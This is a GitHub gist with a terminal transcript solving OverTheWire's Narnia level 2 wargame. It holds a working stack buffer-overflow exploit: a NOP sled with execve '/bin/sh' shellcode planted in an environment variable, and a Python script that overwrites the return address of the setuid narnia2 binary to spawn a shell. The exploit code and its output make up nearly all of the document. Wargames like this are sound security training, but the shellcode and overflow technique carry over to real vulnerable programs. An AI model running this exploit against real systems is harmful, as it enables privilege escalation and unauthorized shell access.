narnia2@melinda:/tmp/.s0$ cat pl_env
export EGG=$(python -c 'print "\x90"*(200) + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x50\x53\x89\xe1\x8b\x54\x24\x08\xb0\x0b\xcd\x80"')
narnia2@melinda:/tmp/.s0$ export EGG=$(python -c 'print "\x90"*(200) + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x50\x53\x89\xe1\x8b\x54\x24\x08\xb0\x0b\xcd\x80"')
narnia2@melinda:/tmp/.s0$ ./env
0xffffd7f5
narnia2@melinda:/tmp/.s0$ nano pl.py
narnia2@melinda:/tmp/.s0$ cat pl.py
#! /usr/bin/python
import sys
import os
from struct import *
from subprocess import call
payload = "\x41"*(140) + pack("<I", 0xffffd7f5)
call(["./foo", payload])
narnia2@melinda:/tmp/.s0$ ln -sf /narnia/narnia2 foo
narnia2@melinda:/tmp/.s0$ python pl.py
$
Created
September 18, 2016 21:02
-
-
Save plvhx/4be1fc22188fd57078ccc962ee162245 to your computer and use it in GitHub Desktop.
overthewire.org narnia level2
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment